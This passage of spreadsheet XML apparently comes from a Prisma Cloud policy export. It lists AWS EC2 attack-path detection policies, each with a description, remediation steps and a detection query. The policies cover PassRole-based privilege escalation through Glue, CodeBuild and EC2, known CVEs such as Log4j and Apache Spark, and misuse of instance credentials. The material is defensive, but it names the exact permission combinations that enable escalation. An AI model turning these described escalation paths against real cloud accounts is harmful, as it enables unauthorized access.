      <c r="AB1727" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1727" t="inlineStr"/>
      <c r="AD1727" t="b">
        <v>1</v>
      </c>
      <c r="AE1727" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1727" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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7" t="inlineStr">
        <is>
          <t>6c0c8bc4-5c8c-42f3-b47a-0c93dec95970</t>
        </is>
      </c>
      <c r="AI1727" t="inlineStr">
        <is>
          <t>0589a9bb-e2bb-4f80-b66c-3a77d5c3041f</t>
        </is>
      </c>
      <c r="AJ1727" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1727" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1728">
      <c r="A1728" t="inlineStr"/>
      <c r="B1728" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1728" s="2" t="inlineStr"/>
      <c r="D1728" t="inlineStr"/>
      <c r="E1728" t="inlineStr"/>
      <c r="F1728" t="inlineStr"/>
      <c r="G1728" t="b">
        <v>1</v>
      </c>
      <c r="H17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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1728" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1728" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable AWS EC2 instance with iam:PassRole and AWS Glue IAM permissions</t>
        </is>
      </c>
      <c r="L1728" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1728" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1728" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1728" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1728" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1728" t="inlineStr"/>
      <c r="R1728" t="inlineStr"/>
      <c r="S1728" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1728" t="b">
        <v>0</v>
      </c>
      <c r="U1728" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1728" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1728" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with critical or high vulnerabilities and privilege escalation permission via PassRole &amp; Glue permissions.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Attacker with access to the PassRole and Glue permissions can create a new job, get dev endpoint details, update a job or dev endpoint and pass a more privileged existing role to it. This would allow an adversary to escalate privileges to the more privileged role.
This policy checks for the following privilege escalation permissions:
'iam:PassRole', 'glue:CreateJob', 'glue:UpdateJob', 'glue:GetDevEndpoint', 'glue:UpdateDevEndpoint' permissions
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the EC2 instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X172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28" t="inlineStr"/>
      <c r="Z1728" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)') and ('AWS IAM policy allows Privilege escalation via PassRole &amp; Glue create job permissions' or 'AWS IAM policy allows Privilege escalation via PassRole &amp; Glue update job permissions' or 'AWS IAM policy allows Privilege escalation via Glue Dev Endpoint permissions')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1728" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1728" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC1728" t="inlineStr"/>
      <c r="AD1728" t="b">
        <v>1</v>
      </c>
      <c r="AE1728" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1728" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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8" t="inlineStr">
        <is>
          <t>47682900-9c5d-45f2-b53d-a0450870e66a</t>
        </is>
      </c>
      <c r="AI1728" t="inlineStr">
        <is>
          <t>4bc3167b-5a6f-4eab-9eb7-13d70471ab68</t>
        </is>
      </c>
      <c r="AJ1728" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1728" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1729">
      <c r="A1729" t="inlineStr"/>
      <c r="B1729" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1729" s="2" t="inlineStr"/>
      <c r="D1729" t="inlineStr"/>
      <c r="E1729" t="inlineStr"/>
      <c r="F1729" t="inlineStr"/>
      <c r="G1729" t="b">
        <v>1</v>
      </c>
      <c r="H17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29" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1729" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1729" t="inlineStr">
        <is>
          <t>Directory Traversal risk due to publicly exposed and vulnerable AWS EC2 instance (ONNX, CVE-2024-27318, CVE-2022-25882)</t>
        </is>
      </c>
      <c r="L1729" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1729" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1729" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1729" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1729" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1729" t="inlineStr"/>
      <c r="R1729" t="inlineStr"/>
      <c r="S1729" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1729" t="b">
        <v>0</v>
      </c>
      <c r="U1729" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1729" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1729" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have a known Directory Traversal vulnerability (ONNX, CVE-2024-27318, CVE-2022-25882).
CVE-2024-27318 vulnerability occurs as a bypass for the patch added for CVE-2022-25882 that affects ONNX which enables unauthorized file access or manipulation through a Directory Traversal attack. With a CVSS base score of 7.5, it involves improper validation of file paths in the external_data field of the tensor proto, affecting versions up to and including 1.15.0. This vulnerability allows an attacker to access files outside the intended directories on the host operating system, potentially leading to information disclosure and system compromise.
The fact that the AWS EC2 instance is publicly exposed makes it an easy target for attackers to exploit this vulnerability. Successful exploitation on the publicly exposed AWS EC2 instance could allow an attacker to access sensitive files, undermining the confidentiality and integrity of the system.
Immediate attention is required to remediate the ONNX (CVE-2024-27318, CVE-2022-25882) vulnerability and the public exposure reported for the affected AWS EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1729" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of reported EC2 Instances based on your business requirement by modifying Security groups rules to the trusted IP address
To modify Security Groups rules,
1. Sign in to AWS Console
2. Navigate to EC2 Dashboard
3. Identify the EC2 instances that you want to restrict access to Internet
4. Click on Security Group attached to the instance
5. Update inbound rules that allow Internet access (0.0.0.0/0) to the trusted IP address
   Refer following link for detailed steps to modify security group rules,
   https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/working-with-security-groups.html#updating-security-group-rules
NOTE: When modifying Security groups rules, make sure that you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[Vulnerability]
To patch or update the vulnerable software refer to https://nvd.nist.gov/vuln/detail/CVE-2024-27318
https://nvd.nist.gov/vuln/detail/CVE-2022-25882</t>
        </is>
      </c>
      <c r="Y1729" t="inlineStr"/>
      <c r="Z1729" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-27318','CVE-2022-25882'))</t>
        </is>
      </c>
      <c r="AA1729" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1729" t="inlineStr">
        <is>
          <t>2024-05-23 08:56:26</t>
        </is>
      </c>
      <c r="AC1729" t="inlineStr"/>
      <c r="AD1729" t="b">
        <v>1</v>
      </c>
      <c r="AE1729" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1729" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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29" t="inlineStr">
        <is>
          <t>f601be60-efa6-4c15-9c8b-f7e44937f286</t>
        </is>
      </c>
      <c r="AI1729" t="inlineStr">
        <is>
          <t>81ddff21-2f9f-422b-aaa3-8e38ef503f34</t>
        </is>
      </c>
      <c r="AJ1729" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1729" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1730">
      <c r="A1730" t="inlineStr"/>
      <c r="B1730" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1730" s="2" t="inlineStr"/>
      <c r="D1730" t="n">
        <v>1</v>
      </c>
      <c r="E1730" t="n">
        <v>0</v>
      </c>
      <c r="F1730" t="n">
        <v>0</v>
      </c>
      <c r="G1730" t="b">
        <v>1</v>
      </c>
      <c r="H17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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1730" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1730" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed AWS EC2 instance with iam:PassRole and ec2:RunInstances permissions</t>
        </is>
      </c>
      <c r="L1730" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1730" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1730" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1730" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1730" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1730" t="inlineStr"/>
      <c r="R1730" t="inlineStr"/>
      <c r="S1730" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1730" t="b">
        <v>0</v>
      </c>
      <c r="U1730" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1730" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1730" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and 'iam:PassRole' and 'ec2:RunInstances' permissions that could potentially lead to privilege escalation.
Publicly exposed EC2 instance having risky privilege escalation IAM permissions on the instance help the attackers to escalate their privilege and move laterally to perform unauthorized actions in the cloud account.
Immediate attention is required to review risky permissions and grant only the least privileges required. Remove unwanted permissions assigned to the EC2 instances. Restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X173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30" t="inlineStr"/>
      <c r="Z1730" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS IAM policy allows Privilege escalation via PassRole &amp; EC2 permissions')</t>
        </is>
      </c>
      <c r="AA1730" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1730" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:32</t>
        </is>
      </c>
      <c r="AC1730" t="inlineStr"/>
      <c r="AD1730" t="b">
        <v>1</v>
      </c>
      <c r="AE1730" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1730" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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0" t="inlineStr">
        <is>
          <t>798e4cd9-aaaa-48bb-b748-3460896c6c28</t>
        </is>
      </c>
      <c r="AI1730" t="inlineStr">
        <is>
          <t>c2cf07da-e50d-4f5f-9e03-40015845c75f</t>
        </is>
      </c>
      <c r="AJ1730" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1730" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1731">
      <c r="A1731" t="inlineStr"/>
      <c r="B1731" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1731" s="2" t="inlineStr"/>
      <c r="D1731" t="inlineStr"/>
      <c r="E1731" t="inlineStr"/>
      <c r="F1731" t="inlineStr"/>
      <c r="G1731" t="b">
        <v>1</v>
      </c>
      <c r="H17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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1731" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1731" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable AWS EC2 instance with iam:PassRole and AWS CodeBuild IAM permissions</t>
        </is>
      </c>
      <c r="L1731" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1731" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1731" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1731" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1731" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1731" t="inlineStr"/>
      <c r="R1731" t="inlineStr"/>
      <c r="S1731" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1731" t="b">
        <v>0</v>
      </c>
      <c r="U1731" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1731" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1731" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with critical or high vulnerabilities and privilege escalation permission via PassRole &amp; CodeBuild permissions.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. An attacker with access to the PassRole and CodeBuild permissions can create a new CodeBuild project and pass a more privileged existing role to it. This allows an adversary to escalate privileges to the more privileged role.
This policy checks for the following privilege escalation permissions:
iam:PassRole, codebuild:CreateProject, codebuild:StartBuild, codebuild:StartBuildBatch permissions
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the EC2 instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X173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31" t="inlineStr"/>
      <c r="Z1731" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS IAM policy allows Privilege escalation via PassRole &amp; CodeBuild permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1731" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1731" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1731" t="inlineStr"/>
      <c r="AD1731" t="b">
        <v>1</v>
      </c>
      <c r="AE1731" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1731" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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1" t="inlineStr">
        <is>
          <t>0683f4f8-3d83-4669-9165-cf2ffb6f8186</t>
        </is>
      </c>
      <c r="AI1731" t="inlineStr">
        <is>
          <t>ab70aaf0-cfbd-4318-8150-75a6b4194b10</t>
        </is>
      </c>
      <c r="AJ1731" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1731" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1732">
      <c r="A1732" t="inlineStr"/>
      <c r="B1732" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1732" s="2" t="inlineStr"/>
      <c r="D1732" t="inlineStr"/>
      <c r="E1732" t="inlineStr"/>
      <c r="F1732" t="inlineStr"/>
      <c r="G1732" t="b">
        <v>1</v>
      </c>
      <c r="H17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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1732" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1732" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) or Denial of Service (DoS) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [MS15-034 Microsoft IIS, CVE-2015-1635]</t>
        </is>
      </c>
      <c r="L1732" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1732" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1732" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1732" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1732" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1732" t="inlineStr"/>
      <c r="R1732" t="inlineStr"/>
      <c r="S1732" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1732" t="b">
        <v>0</v>
      </c>
      <c r="U1732" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1732" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1732" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to either Remote Code Execution (RCE) or Denial of Service (DoS) with exploits in the wild [MS15-034 Microsoft IIS, CVE-2015-1635].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version exposed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the MS15-034 Microsoft IIS vulnerability [CVE-2015-1635] reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X173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CVE-2015-1635
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2015-1635</t>
        </is>
      </c>
      <c r="Y1732" t="inlineStr"/>
      <c r="Z1732" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2015-1635 - MS15-034 Microsoft IIS DoS or RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2015-1635'))</t>
        </is>
      </c>
      <c r="AA1732" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1732" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:35</t>
        </is>
      </c>
      <c r="AC1732" t="inlineStr"/>
      <c r="AD1732" t="b">
        <v>1</v>
      </c>
      <c r="AE1732" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1732" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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2" t="inlineStr">
        <is>
          <t>5d37419a-ca20-48f1-8c47-1fc066754a98</t>
        </is>
      </c>
      <c r="AI1732" t="inlineStr">
        <is>
          <t>2ead0a2e-09e9-4639-b90c-6f5284c523f8</t>
        </is>
      </c>
      <c r="AJ1732" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1732" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1733">
      <c r="A1733" t="inlineStr"/>
      <c r="B1733" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1733" s="2" t="inlineStr"/>
      <c r="D1733" t="inlineStr"/>
      <c r="E1733" t="inlineStr"/>
      <c r="F1733" t="inlineStr"/>
      <c r="G1733" t="b">
        <v>1</v>
      </c>
      <c r="H17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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1733" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1733" t="inlineStr">
        <is>
          <t>Unauthorized changes risk to an entire AWS organization's resources and settings due to AWS EC2 instance with unusual usage of instance role credentials and ORG level 'write' permissions</t>
        </is>
      </c>
      <c r="L1733" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1733" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1733" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1733" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1733" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1733" t="inlineStr"/>
      <c r="R1733" t="inlineStr"/>
      <c r="S1733" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1733" t="b">
        <v>0</v>
      </c>
      <c r="U1733" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1733" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1733" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with unusual usage of instance role credentials and has ORG level WRITE permissions that could potentially lead to privilege escalation.
Risky permissions on AWS EC2 instances with unusual usage of instance role credentials may allow an attacker to get initial access to the instance. EC2 instance with ORG level write permissions could further expand the surface of the attacker and move laterally to perform unauthorized actions in the cloud account. Unusual EC2 role credential usage from outside the cloud may indicate instance is already compromised.
This policy checks for the following risky permissions that could potentially lead to privilege escalation:
'organizations:AcceptHandshake', 'organizations:AttachPolicy', 'organizations:CancelHandshake', 'organizations:CreateAccount', 'organizations:CreateGovCloudAccount', 'organizations:CreateOrganization', 'organizations:CreateOrganizationalUnit', 'organizations:CreatePolicy', 'organizations:DeclineHandshake', 'organizations:DeleteOrganization', 'organizations:DeleteOrganizationalUnit', 'organizations:DeletePolicy', 'organizations:DeregisterDelegatedAdministrator', 'organizations:DetachPolicy', 'organizations:DisableAWSServiceAccess', 'organizations:DisablePolicyType', 'organizations:EnableAWSServiceAccess', 'organizations:EnableAllFeatures', 'organizations:EnablePolicyType', 'organizations:InviteAccountToOrganization', 'organizations:LeaveOrganization', 'organizations:MoveAccount', 'organizations:RegisterDelegatedAdministrator', 'organizations:RemoveAccountFromOrganization', 'organizations:UpdateOrganizationalUnit', 'organizations:UpdatePolicy'
Immediate attention is required to review unusual usage activity of instance role credentials and risky ORG level write permissions.</t>
        </is>
      </c>
      <c r="X1733"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33" t="inlineStr"/>
      <c r="Z1733" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Unusual usage of Workload Credentials from outside the Cloud','AWS EC2 Instance with AWS Organization management permissions')</t>
        </is>
      </c>
      <c r="AA1733" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1733" t="inlineStr">
        <is>
          <t>2024-02-02 08:15:31</t>
        </is>
      </c>
      <c r="AC1733" t="inlineStr"/>
      <c r="AD1733" t="b">
        <v>1</v>
      </c>
      <c r="AE1733" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1733" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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3" t="inlineStr">
        <is>
          <t>7ff8961a-df82-4dab-bd62-71e092c9b201</t>
        </is>
      </c>
      <c r="AI1733" t="inlineStr">
        <is>
          <t>f42b57e1-f813-438a-b7c7-05ee324d6a55</t>
        </is>
      </c>
      <c r="AJ1733" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1733" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1734">
      <c r="A1734" t="inlineStr"/>
      <c r="B1734" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1734" s="2" t="inlineStr"/>
      <c r="D1734" t="inlineStr"/>
      <c r="E1734" t="inlineStr"/>
      <c r="F1734" t="inlineStr"/>
      <c r="G1734" t="b">
        <v>1</v>
      </c>
      <c r="H17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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1734" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1734" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [Apache Spark, CVE-2022-33891]</t>
        </is>
      </c>
      <c r="L1734" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1734" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1734" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1734" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1734" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1734" t="inlineStr"/>
      <c r="R1734" t="inlineStr"/>
      <c r="S1734" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1734" t="b">
        <v>0</v>
      </c>
      <c r="U1734" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1734" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1734" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to Remote Code Execution (RCE) with exploits in the wild[Apache Spark, CVE-2022-33891].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of Apache Spark software installed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the Apache Spark RCE [CVE-2022-33891] vulnerability reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X173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1734" t="inlineStr"/>
      <c r="Z1734" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-33891 - Apache Spark RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-33891'))</t>
        </is>
      </c>
      <c r="AA1734" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1734" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:33</t>
        </is>
      </c>
      <c r="AC1734" t="inlineStr"/>
      <c r="AD1734" t="b">
        <v>1</v>
      </c>
      <c r="AE1734" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1734" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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4" t="inlineStr">
        <is>
          <t>20460acd-772d-4dd6-a00a-aaa203d43866</t>
        </is>
      </c>
      <c r="AI1734" t="inlineStr">
        <is>
          <t>d2935aed-7b9b-4bc9-9eae-fa9d6b638831</t>
        </is>
      </c>
      <c r="AJ1734" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1734" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1735">
      <c r="A1735" t="inlineStr"/>
      <c r="B1735" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1735" s="2" t="inlineStr"/>
      <c r="D1735" t="inlineStr"/>
      <c r="E1735" t="inlineStr"/>
      <c r="F1735" t="inlineStr"/>
      <c r="G1735" t="b">
        <v>1</v>
      </c>
      <c r="H17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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1735" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1735" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance (Apache Log4j, CVE-2021-44832)</t>
        </is>
      </c>
      <c r="L1735" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1735" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1735" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1735" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
